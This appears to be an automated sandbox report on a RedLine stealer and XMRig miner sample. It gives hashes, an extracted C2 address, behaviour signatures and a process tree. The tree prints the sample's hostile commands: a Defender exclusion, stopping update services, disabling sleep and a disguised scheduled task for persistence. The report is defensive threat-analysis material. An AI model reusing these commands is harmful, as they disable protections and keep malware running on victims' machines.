Analysis
-
max time kernel
145s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
08-08-2023 10:18
Behavioral task
behavioral1
Sample
3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe
Resource
win10v2004-20230703-en
General
-
Target
3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe
-
Size
208KB
-
MD5
1f90044095036f77dc1edee283b7ab03
-
SHA1
2265afa4259496c5b45b8e61c97c98244b3de86d
-
SHA256
c4efb8d7a199d7b85411e8a109e3d13982a1190be2d6237431379d5228552eba
-
SHA512
16917231e2435abf74932c77e6935c25e9d26daca6798698e0417addc8953f8f6e5501c5d2fa17f43a6c10e0839be65ee420a17b09ce583401386aa2f03b7885
-
SSDEEP
3072:4eG4mt57f3YInEGK2U/YetUBaVa0b6AyM9w+Zxwak8e8hV:S4mt57gInEG3YetMb6
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
209.250.248.11:33522
-
auth_value
3a050df92d0cf082b2cdaf87863616be
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 1632 created 1220 1632 setup.exe 11 PID 1632 created 1220 1632 setup.exe 11 PID 1632 created 1220 1632 setup.exe 11 PID 1632 created 1220 1632 setup.exe 11 PID 1632 created 1220 1632 setup.exe 11 PID 2576 created 1220 2576 updater.exe 11 PID 2576 created 1220 2576 updater.exe 11 PID 2576 created 1220 2576 updater.exe 11 PID 2576 created 1220 2576 updater.exe 11 PID 2576 created 1220 2576 updater.exe 11 PID 2576 created 1220 2576 updater.exe 11 -
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/2576-226-0x000000013FDF0000-0x0000000141016000-memory.dmp xmrig behavioral1/memory/2348-230-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2348-232-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2348-234-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2348-236-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2348-238-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2348-240-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts setup.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 2444 mi.exe 1632 setup.exe 2576 updater.exe -
Loads dropped DLL 3 IoCs
pid Process 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 2444 mi.exe 2332 taskeng.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0010000000014b7e-144.dat themida behavioral1/files/0x0010000000014b7e-147.dat themida behavioral1/files/0x0010000000014b7e-142.dat themida behavioral1/memory/1632-148-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-150-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-151-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-152-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-153-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-154-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-155-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-157-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/memory/1632-163-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/files/0x0010000000014b7e-187.dat themida behavioral1/memory/1632-189-0x000000013F420000-0x0000000140646000-memory.dmp themida behavioral1/files/0x0010000000014f10-191.dat themida behavioral1/files/0x0010000000014f10-194.dat themida behavioral1/memory/2576-195-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-197-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-198-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-199-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-200-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-201-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-202-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-203-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/memory/2576-205-0x000000013FDF0000-0x0000000141016000-memory.dmp themida behavioral1/files/0x0010000000014f10-223.dat themida behavioral1/memory/2576-226-0x000000013FDF0000-0x0000000141016000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1632 setup.exe 2576 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2576 set thread context of 2832 2576 updater.exe 73 PID 2576 set thread context of 2348 2576 updater.exe 74 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1620 sc.exe 1908 sc.exe 2476 sc.exe 2808 sc.exe 112 sc.exe 1568 sc.exe 1592 sc.exe 1720 sc.exe 1596 sc.exe 2852 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 952 schtasks.exe 2992 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0fc78d1e1c9d901 powershell.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 1632 setup.exe 1632 setup.exe 1044 powershell.exe 1632 setup.exe 1632 setup.exe 1632 setup.exe 1632 setup.exe 1632 setup.exe 1632 setup.exe 2060 powershell.exe 1632 setup.exe 1632 setup.exe 2576 updater.exe 2576 updater.exe 1300 powershell.exe 2576 updater.exe 2576 updater.exe 2576 updater.exe 2576 updater.exe 2576 updater.exe 2576 updater.exe 2460 powershell.exe 2576 updater.exe 2576 updater.exe 2576 updater.exe 2576 updater.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe 2348 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeShutdownPrivilege 1824 powercfg.exe Token: SeShutdownPrivilege 1284 powercfg.exe Token: SeDebugPrivilege 2060 powershell.exe Token: SeShutdownPrivilege 364 powercfg.exe Token: SeShutdownPrivilege 1788 powercfg.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeShutdownPrivilege 2520 powercfg.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeShutdownPrivilege 1344 powercfg.exe Token: SeShutdownPrivilege 2824 powercfg.exe Token: SeShutdownPrivilege 2716 powercfg.exe Token: SeLockMemoryPrivilege 2348 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2556 wrote to memory of 2444 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 29 PID 2556 wrote to memory of 2444 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 29 PID 2556 wrote to memory of 2444 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 29 PID 2556 wrote to memory of 2444 2556 3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe 29 PID 2444 wrote to memory of 1632 2444 mi.exe 30 PID 2444 wrote to memory of 1632 2444 mi.exe 30 PID 2444 wrote to memory of 1632 2444 mi.exe 30 PID 2444 wrote to memory of 1632 2444 mi.exe 30 PID 532 wrote to memory of 1908 532 cmd.exe 37 PID 532 wrote to memory of 1908 532 cmd.exe 37 PID 532 wrote to memory of 1908 532 cmd.exe 37 PID 532 wrote to memory of 2476 532 cmd.exe 38 PID 532 wrote to memory of 2476 532 cmd.exe 38 PID 532 wrote to memory of 2476 532 cmd.exe 38 PID 532 wrote to memory of 2808 532 cmd.exe 39 PID 532 wrote to memory of 2808 532 cmd.exe 39 PID 532 wrote to memory of 2808 532 cmd.exe 39 PID 532 wrote to memory of 1720 532 cmd.exe 40 PID 532 wrote to memory of 1720 532 cmd.exe 40 PID 532 wrote to memory of 1720 532 cmd.exe 40 PID 532 wrote to memory of 112 532 cmd.exe 41 PID 532 wrote to memory of 112 532 cmd.exe 41 PID 532 wrote to memory of 112 532 cmd.exe 41 PID 2076 wrote to memory of 1824 2076 cmd.exe 46 PID 2076 wrote to memory of 1824 2076 cmd.exe 46 PID 2076 wrote to memory of 1824 2076 cmd.exe 46 PID 2076 wrote to memory of 1284 2076 cmd.exe 47 PID 2076 wrote to memory of 1284 2076 cmd.exe 47 PID 2076 wrote to memory of 1284 2076 cmd.exe 47 PID 2076 wrote to memory of 364 2076 cmd.exe 48 PID 2076 wrote to memory of 364 2076 cmd.exe 48 PID 2076 wrote to memory of 364 2076 cmd.exe 48 PID 2060 wrote to memory of 952 2060 powershell.exe 49 PID 2060 wrote to memory of 952 2060 powershell.exe 49 PID 2060 wrote to memory of 952 2060 powershell.exe 49 PID 2076 wrote to memory of 1788 2076 cmd.exe 50 PID 2076 wrote to memory of 1788 2076 cmd.exe 50 PID 2076 wrote to memory of 1788 2076 cmd.exe 50 PID 2332 wrote to memory of 2576 2332 taskeng.exe 54 PID 2332 wrote to memory of 2576 2332 taskeng.exe 54 PID 2332 wrote to memory of 2576 2332 taskeng.exe 54 PID 2144 wrote to memory of 1568 2144 cmd.exe 59 PID 2144 wrote to memory of 1568 2144 cmd.exe 59 PID 2144 wrote to memory of 1568 2144 cmd.exe 59 PID 2144 wrote to memory of 1592 2144 cmd.exe 60 PID 2144 wrote to memory of 1592 2144 cmd.exe 60 PID 2144 wrote to memory of 1592 2144 cmd.exe 60 PID 2144 wrote to memory of 1596 2144 cmd.exe 61 PID 2144 wrote to memory of 1596 2144 cmd.exe 61 PID 2144 wrote to memory of 1596 2144 cmd.exe 61 PID 2144 wrote to memory of 2852 2144 cmd.exe 62 PID 2144 wrote to memory of 2852 2144 cmd.exe 62 PID 2144 wrote to memory of 2852 2144 cmd.exe 62 PID 2144 wrote to memory of 1620 2144 cmd.exe 63 PID 2144 wrote to memory of 1620 2144 cmd.exe 63 PID 2144 wrote to memory of 1620 2144 cmd.exe 63 PID 1704 wrote to memory of 2520 1704 cmd.exe 68 PID 1704 wrote to memory of 2520 1704 cmd.exe 68 PID 1704 wrote to memory of 2520 1704 cmd.exe 68 PID 1704 wrote to memory of 1344 1704 cmd.exe 69 PID 1704 wrote to memory of 1344 1704 cmd.exe 69 PID 1704 wrote to memory of 1344 1704 cmd.exe 69 PID 1704 wrote to memory of 2824 1704 cmd.exe 70 PID 1704 wrote to memory of 2824 1704 cmd.exe 70
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe"C:\Users\Admin\AppData\Local\Temp\3752-126-0x00000000044A0000-0x00000000044D4000-memory.exe"2⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Users\Admin\AppData\Local\Temp\mi.exe"C:\Users\Admin\AppData\Local\Temp\mi.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1632
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2476
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2808
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1720
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:112
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:952
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2660
-
-
